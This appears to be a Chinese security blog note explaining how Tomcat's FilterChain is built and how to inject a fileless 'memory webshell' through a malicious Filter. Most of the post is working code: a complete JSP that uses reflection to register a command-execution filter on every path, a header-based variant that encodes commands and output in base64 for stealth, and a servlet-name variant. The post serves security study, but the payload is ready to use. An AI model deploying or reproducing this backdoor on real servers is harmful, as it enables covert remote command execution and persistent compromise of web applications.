filter内存马

2025-05-13

笔记

内存马是什么

简单说就是没有文件落地的webshell。

常规的java webshell都是上传一个jsp文件，访问这个jsp文件的路径执行命令。但是这样做查文件很容易查出来，文件一删webshell就没了。

内存马是在内存里的，可以访问到但找不到对应路径的文件，后缀也不一定是jsp。更隐蔽，更难排查。

Filter型内存马

内存马有很多种实现方式，filter型内存马是通过filter实现的内存马。

filter是在请求被servlet处理之前执行的一段程序，可以对请求进行拦截、修改。通常用来实现一些业务逻辑之外的功能，比如日志记录、全站加密、权限校验等。

通过修改存储filter的变量，把webshell放在filter里，就是filter型内存马。

环境搭建

装个tomcat。

IDEA里新建项目，Jakarta EE，Web应用程序

应用程序服务器新建，选择tomcat目录，apache-tomcat-10.1.40

点上边运行，如果自动打开了tomcat服务的web，那就成功了。

端口占用的要么把burp关掉，要么改成别的端口，我改成888了。

准备环境

先写个正常的filter

src/main/java/org/example/demo2/filter1.java

package org.example.demo2;

import jakarta.servlet.*;

import java.io.IOException;

public class filter1 implements Filter {

    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        Filter.super.init(filterConfig);
    }

    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
        System.out.println("do filter1");
        chain.doFilter(request, response);
    }

    @Override
    public void destroy() {
        Filter.super.destroy();
    }
}

然后加到web.xml里

src/main/webapp/WEB-INF/web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="https://jakarta.ee/xml/ns/jakartaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="https://jakarta.ee/xml/ns/jakartaee https://jakarta.ee/xml/ns/jakartaee/web-app_6_0.xsd"
         version="6.0">
    <filter>
        <filter-name>filter1name</filter-name>
        <filter-class>org.example.demo2.filter1</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>filter1name</filter-name>
        <url-pattern>/filter1</url-pattern>
    </filter-mapping>
</web-app>

在pom.xml里加上依赖，不然调试的时候看不到源码：

<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-catalina</artifactId>
    <version>10.1.40</version>
</dependency>
<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-websocket</artifactId>
    <version>10.1.40</version>
</dependency>

到设置里把“不要进入类”取消，不然调试的时候自动跳过一堆

在自己写的filter里的chain.doFilter(request, response);打断点，调试运行，访问http://localhost:888/demo2_war_exploded/filter1 的时候会断到这里。

Filter调用过程分析

简单来说，运行的时候按照在web.xml里<filter-mapping>注册的顺序生成一个FilterChain，filter调用的过程就是按顺序执行FilterChain里的filter，每个filter里的chain.doFilter都是调用下一个filter的doFilter，直到走到tomcat自带的最后一个filter调用servlet的service方法。

FilterChain是根据StandardContext里的filterConfigs 、filterDefs 和filterMaps生成的。修改这三个变量就能添加一个可以执行webshell的filter，这就是filter型内存马的注入过程。

详细调试过程参考Java内存马系列-03-Tomcat 之 Filter 型内存马 | Drunkbaby’s Blog

可能是反编译的原因，这篇文章里的代码和实际下载的源码不太一样，尤其是if嵌套的结构上，应该是编译的时候优化了。

这部分不重要，知道是按顺序执行FilterChain里的filter就行

按照上面的操作断到chain.doFilter之后，跟进去。

public void doFilter(ServletRequest request, ServletResponse response) throws IOException, ServletException {

    if (Globals.IS_SECURITY_ENABLED) {
        //此处省略
    } else {
        internalDoFilter(request, response);
    }
}

Globals.IS_SECURITY_ENABLED是False，这个东西是个什么安全管理器的标志，已经弃用了，不用考虑是true的情况。而且就算是true里面也会调用internalDoFilter，不影响：

到else里的internalDoFilter，跟进去：

private void internalDoFilter(ServletRequest request, ServletResponse response)
        throws IOException, ServletException {

    // Call the next filter if there is one
    if (pos < n) {
        ApplicationFilterConfig filterConfig = filters[pos++];
        try {
            Filter filter = filterConfig.getFilter();

            if (request.isAsyncSupported() && !(filterConfig.getFilterDef().getAsyncSupportedBoolean())) {
                request.setAttribute(Globals.ASYNC_SUPPORTED_ATTR, Boolean.FALSE);
            }
            if (Globals.IS_SECURITY_ENABLED) {
                final ServletRequest req = request;
                final ServletResponse res = response;
                Principal principal = ((HttpServletRequest) req).getUserPrincipal();

                Object[] args = new Object[] { req, res, this };
                SecurityUtil.doAsPrivilege("doFilter", filter, classType, args, principal);
            } else {
                filter.doFilter(request, response, this);//调用下一个filter的doFilter
            }
        } catch (IOException | ServletException | RuntimeException e) {
            throw e;
        } catch (Throwable e) {
            e = ExceptionUtils.unwrapInvocationTargetException(e);
            ExceptionUtils.handleThrowable(e);
            throw new ServletException(sm.getString("filterChain.filter"), e);
        }
        return;
    }
//此处省略
}

pos是现在执行的filter的下标(从0开始)，n是filter总数，tomcat有一个内置的filter最后执行，加上自定义的是俩。

下边filters[pos++]取出下一个filter，这个就是tomcat内置的filter，经过一堆乱七八糟的判断和修改之后又调用了这个filter的doFilter，再进去。

public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
        throws IOException, ServletException {

    // This filter only needs to handle WebSocket upgrade requests
    if (!sc.areEndpointsRegistered() || !UpgradeUtil.isWebSocketUpgradeRequest(request, response)) {
        chain.doFilter(request, response);//调用FilterChain的doFilter
        return;
    }
    //此处省略
}

这里面调用了FilterChain的doFilter，再进去，发现又到了ApplicationFilterChain的doFilter里，就是最开始进到的那个：

public void doFilter(ServletRequest request, ServletResponse response) throws IOException, ServletException {

    if (Globals.IS_SECURITY_ENABLED) {
        //此处省略
    } else {
        internalDoFilter(request, response);
    }
}

然后到internalDoFilter里：

private void internalDoFilter(ServletRequest request, ServletResponse response)
        throws IOException, ServletException {

    // Call the next filter if there is one
    if (pos < n) {//pos==n，返回false
    //此处省略
    }

    // We fell off the end of the chain -- call the servlet instance
    try {
        if (dispatcherWrapsSameObject) {
            lastServicedRequest.set(request);
            lastServicedResponse.set(response);
        }

        if (request.isAsyncSupported() && !servletSupportsAsync) {
            request.setAttribute(Globals.ASYNC_SUPPORTED_ATTR, Boolean.FALSE);
        }
        // Use potentially wrapped request from this point
        if ((request instanceof HttpServletRequest) && (response instanceof HttpServletResponse) &&
                Globals.IS_SECURITY_ENABLED) {
            final ServletRequest req = request;
            final ServletResponse res = response;
            Principal principal = ((HttpServletRequest) req).getUserPrincipal();
            Object[] args = new Object[] { req, res };
            SecurityUtil.doAsPrivilege("service", servlet, classTypeUsedInService, args, principal);
        } else {
            servlet.service(request, response);//交给servlet处理
        }
    } catch (IOException | ServletException | RuntimeException e) {
        throw e;
    } catch (Throwable e) {
        e = ExceptionUtils.unwrapInvocationTargetException(e);
        ExceptionUtils.handleThrowable(e);
        throw new ServletException(sm.getString("filterChain.servlet"), e);
    } finally {
        if (dispatcherWrapsSameObject) {
            lastServicedRequest.set(null);
            lastServicedResponse.set(null);
        }
    }
}

此时pos是2，执行else里的内容，往下走，经过一堆判断之后执行servlet.service，后面的是servlet里的代码，和filter无关了。

从上面的过程中可以看出filter都存在FilterChain里，filter的调用过程就是遍历FilterChain一个一个的执行。只要能在FilterChain里加上带webshell的filter就可以执行webshell。

ApplicationFilterChain确实有一个addFilter方法。能不能调用addFilter方法添加filter？不能，因为jsp运行的时候拿不到FilterChain，没办法调用它的方法。

FilterChain生成过程分析

在addFilter上打个断点，看看addFilter是在哪调用的。

在ApplicationFilterFactory的createFilterChain里

public static ApplicationFilterChain createFilterChain(ServletRequest request, Wrapper wrapper, Servlet servlet) {
//此处省略
    // Acquire the filter mappings for this Context
    StandardContext context = (StandardContext) wrapper.getParent();
    filterChain.setDispatcherWrapsSameObject(context.getDispatcherWrapsSameObject());
    //filterMaps在这
    FilterMap[] filterMaps = context.findFilterMaps();

    // If there are no filter mappings, we are done
    if (filterMaps == null || filterMaps.length == 0) {
        return filterChain;
    }

    // Acquire the information we will need to match filter mappings
    DispatcherType dispatcher = (DispatcherType) request.getAttribute(Globals.DISPATCHER_TYPE_ATTR);

    String requestPath = FilterUtil.getRequestPath(request);

    String servletName = wrapper.getName();

    // Add the relevant path-mapped filters to this filter chain
    for (FilterMap filterMap : filterMaps) {
        if (!matchDispatcher(filterMap, dispatcher)) {
            continue;
        }
        if (!FilterUtil.matchFiltersURL(filterMap, requestPath)) {
            continue;
        }
        //filterConfig在这
        ApplicationFilterConfig filterConfig =
                (ApplicationFilterConfig) context.findFilterConfig(filterMap.getFilterName());
        if (filterConfig == null) {
            log.warn(sm.getString("applicationFilterFactory.noFilterConfig", filterMap.getFilterName()));
            continue;
        }
        filterChain.addFilter(filterConfig);//addFilter在这
    }
//此处省略

可以看到参数有一个filterConfig，找一下filterConfig是哪来的

ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) context.findFilterConfig(filterMap.getFilterName());

是context的findFilterConfig返回的，进去发现是从context的名为filterConfigs的Map里直接取出来的，key就是参数里传的filterMap.getFilterName()。

再看下filterMap是哪来的

filterMap是遍历filterMaps的元素，filterMaps是context.findFilterMaps();，进去发现也是从context的Map里取的，Map名是filterMaps。

context是StandardContext，StandardContext 代表了一个 Web 应用程序。每个部署到 Tomcat 的 Web 应用都被表示为 StandardContext 的一个实例。这个类负责管理与该 Web 应用相关的所有资源和服务，包括但不限于：Servlets、Listeners、Filters、静态资源。

所以只要在context里的filterMaps和filterConfigs里加上自己filter的filterConfig和filterMap就行。

构造filterConfig

filterConfigs就是一个Map，添加元素直接put就行。

filterConfigs里的元素filterConfig是ApplicationFilterConfig，构造方法如下：

ApplicationFilterConfig(Context context, FilterDef filterDef)
        throws ClassCastException, ReflectiveOperationException, ServletException, NamingException,
        IllegalArgumentException, SecurityException {

    super();

    this.context = context;
    this.filterDef = filterDef;
    // Allocate a new filter instance if necessary
    if (filterDef.getFilter() == null) {
        getFilter();
    } else {
        this.filter = filterDef.getFilter();
        context.getInstanceManager().newInstance(filter);
        initFilter();
    }
}

构造方法有两个参数，其中context就是前面的StandardContext，可以打个断点看一下。filterDef是org.apache.tomcat.util.descriptor.web.FilterDef，这个倒是public的不用反射了，就是没有构造方法，要调里边的set方法。打个断点看一下可以发现在**org.apache.catalina.core.ApplicationContext#addFilter(java.lang.String, java.lang.String, jakarta.servlet.Filter)**里有：

private FilterRegistration.Dynamic addFilter(String filterName, String filterClass, Filter filter)
        throws IllegalStateException {

    if (filterName == null || filterName.isEmpty()) {
        throw new IllegalArgumentException(sm.getString("applicationContext.invalidFilterName", filterName));
    }

    // TODO Spec breaking enhancement to ignore this restriction
    checkState("applicationContext.addFilter.ise");

    FilterDef filterDef = context.findFilterDef(filterName);

    // Assume a 'complete' FilterRegistration is one that has a class and
    // a name
    if (filterDef == null) {
        filterDef = new FilterDef();
        filterDef.setFilterName(filterName);
        context.addFilterDef(filterDef);
    } else {
        if (filterDef.getFilterName() != null && filterDef.getFilterClass() != null) {
            return null;
        }
    }

    if (filter == null) {
        filterDef.setFilterClass(filterClass);
    } else {
        filterDef.setFilterClass(filter.getClass().getName());
        filterDef.setFilter(filter);
    }

    return new ApplicationFilterRegistration(filterDef, context);
}

new FilterDef之后调用了setFilterName、setFilterClass和setFilter。所以构造只set这三个就行。

构造filterMap

filterMaps是一个静态内部类ContextFilterMaps，有一个add方法和一个addBefore方法，都能添加filterMap，区别就是一个加后边一个加前边，一般情况下影响不大，除非有filter写的waf，那就只能用addBefore。

filterMap在org.apache.catalina.core.ApplicationFilterRegistration#addMappingForUrlPatterns里用过：

public void addMappingForUrlPatterns(EnumSet<DispatcherType> dispatcherTypes, boolean isMatchAfter,
        String... urlPatterns) {

    FilterMap filterMap = new FilterMap();

    filterMap.setFilterName(filterDef.getFilterName());

    if (dispatcherTypes != null) {
        for (DispatcherType dispatcherType : dispatcherTypes) {
            filterMap.setDispatcher(dispatcherType.name());
        }
    }

    if (urlPatterns != null) {
        // % decoded (if necessary) using UTF-8
        for (String urlPattern : urlPatterns) {
            filterMap.addURLPattern(urlPattern);
        }

        if (isMatchAfter) {
            context.addFilterMap(filterMap);
        } else {
            context.addFilterMapBefore(filterMap);
        }
    }
    // else error?

}

可以看到new出来以后调了setFilterName、setDispatcher、addURLPattern。自己写的时候也调这些就行。

到这里就差不多了，尝试构造一下

内存马的构造

<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="java.util.Map" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.util.Scanner" %>
<%@ page import="java.lang.reflect.Method" %>
<%
    final String name = "mmmmmmm";//随便起
    //Filter马
    Filter maFilter = new Filter() {

        @Override
        public void init(FilterConfig filterConfig) throws ServletException {
            Filter.super.init(filterConfig);
        }

        @Override
        public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
            HttpServletRequest req = (HttpServletRequest) request;
            if (req.getParameter("cmd") != null) {
                InputStream in = Runtime.getRuntime().exec(req.getParameter("cmd")).getInputStream();
                Scanner s = new Scanner(in).useDelimiter("\\a");
                String output = s.hasNext() ? s.next() : "";
                response.getWriter().write(output);
                response.getWriter().flush();
                return;
            }
            chain.doFilter(request, response);
        }

        @Override
        public void destroy() {
            Filter.super.destroy();
        }
    };

    //构造filterMap
    FilterMap filterMap = new FilterMap();
    filterMap.addURLPattern("/*");
    filterMap.setFilterName(name);
    filterMap.setDispatcher(DispatcherType.REQUEST.name());

    //构造filterDef
    FilterDef filterDef = new FilterDef();
    filterDef.setFilterName(name);
    filterDef.setFilter(maFilter);
    filterDef.setFilterClass(maFilter.getClass().getName());

    //找StandardContext，下边构造构造filterConfig、修改filterConfigs和filterMaps要用。jsp里打个断点对着右下角变量监视器找，反射一步一步拿到
    ServletContext servletContext = pageContext.getServletContext();
    System.out.println(servletContext.getClass().getName());

    Field context = servletContext.getClass().getDeclaredField("context");
    context.setAccessible(true);
    ApplicationContext appc = (ApplicationContext) context.get(servletContext);
    System.out.println(appc.getClass().getName());

    Field context2 = ApplicationContext.class.getDeclaredField("context");
    context2.setAccessible(true);
    StandardContext stc = (StandardContext) context2.get(appc);
    System.out.println(stc.getClass().getName());

    //构造filterConfig，构造方法不是public只能反射
    Constructor filterConfigConstructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
    filterConfigConstructor.setAccessible(true);
    ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) filterConfigConstructor.newInstance(stc, filterDef);

    //反射获取filterConfigs
    Field filterConfigs = stc.getClass().getDeclaredField("filterConfigs");
    filterConfigs.setAccessible(true);
    Map flcs = (Map) filterConfigs.get(stc);

    //把filterConfig添加到filterConfigs里
    flcs.put(name, filterConfig);

    //把filterMap添加到filterMaps里，其实直接stc.addFilterMapBefore(filterMap);就行，下面这一串是反射添加的
    Field filterMaps = stc.getClass().getDeclaredField("filterMaps");
    filterMaps.setAccessible(true);
    Object fltmps = filterMaps.get(stc);
    Class filterMapsClass = fltmps.getClass();
    Method filterMapsAdd = filterMapsClass.getDeclaredMethod("addBefore", FilterMap.class);
    filterMapsAdd.setAccessible(true);
    filterMapsAdd.invoke(fltmps, filterMap);

    //filterDef不用添加，加了也不影响
    //stc.addFilterDef(filterDef);
%>

开起来服务访问这个jsp就注入内存马了，这时候访问任意路径带上cmd参数都能执行命令。

把filterMap添加到filterMaps里的时候直接stc.addFilterMapBefore(filterMap)就行，里面调了addBefore，不用自己反射调用了：

public void addFilterMapBefore(FilterMap filterMap) {
    validateFilterMap(filterMap);
    // Add this filter mapping to our registered set
    filterMaps.addBefore(filterMap);
    fireContainerEvent("addFilterMap", filterMap);
}

明白了原理就可以自己改内存马了，比如从请求头里获取命令，从响应头里获取结果：

public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
    HttpServletRequest req = (HttpServletRequest) request;
    if (req.getHeader("man") != null) {
        String cmd= new String(Base64.getDecoder().decode(req.getHeader("man").getBytes(StandardCharsets.UTF_8)));
        InputStream is = Runtime.getRuntime().exec(cmd).getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
        StringBuilder sb = new StringBuilder();
        String line;
        while ((line = reader.readLine()) != null) {
            sb.append(line).append("\n");
        }
        String result=sb.toString();
        System.out.println(result);
        String base64Result= Base64.getEncoder().encodeToString(result.getBytes(StandardCharsets.UTF_8));
        HttpServletResponseWrapper wrapper = new HttpServletResponseWrapper((HttpServletResponse) response);
        wrapper.addHeader("say",base64Result);
        chain.doFilter(request,wrapper);
        return;
    }
    chain.doFilter(request, response);
}

扩展

在分析FilterChain的构造过程的时候，发现下面还有一段：

ApplicationFilterFactory.java

// Add filters that match on servlet name second
for (FilterMap filterMap : filterMaps) {
    if (!matchDispatcher(filterMap, dispatcher)) {
        continue;
    }
    if (!matchFiltersServlet(filterMap, servletName)) {
        continue;
    }
    ApplicationFilterConfig filterConfig =
            (ApplicationFilterConfig) context.findFilterConfig(filterMap.getFilterName());
    if (filterConfig == null) {
        log.warn(sm.getString("applicationFilterFactory.noFilterConfig", filterMap.getFilterName()));
        continue;
    }
    filterChain.addFilter(filterConfig);
}

<filter-mapping>其实有两种，一种是上面用的根据url-pattern触发的，另一种是根据servlet-name触发的。ApplicationFilterFactory里的这第二段就是根据servlet-name触发的。

所以构造内存马的时候也可以构造用servlet-name的filterMap

改一下filterMap构造的部分就行：

//构造filterMap
FilterMap filterMap = new FilterMap();
filterMap.addServletName("helloServlet");
filterMap.setFilterName(name);
filterMap.setDispatcher(DispatcherType.REQUEST.name());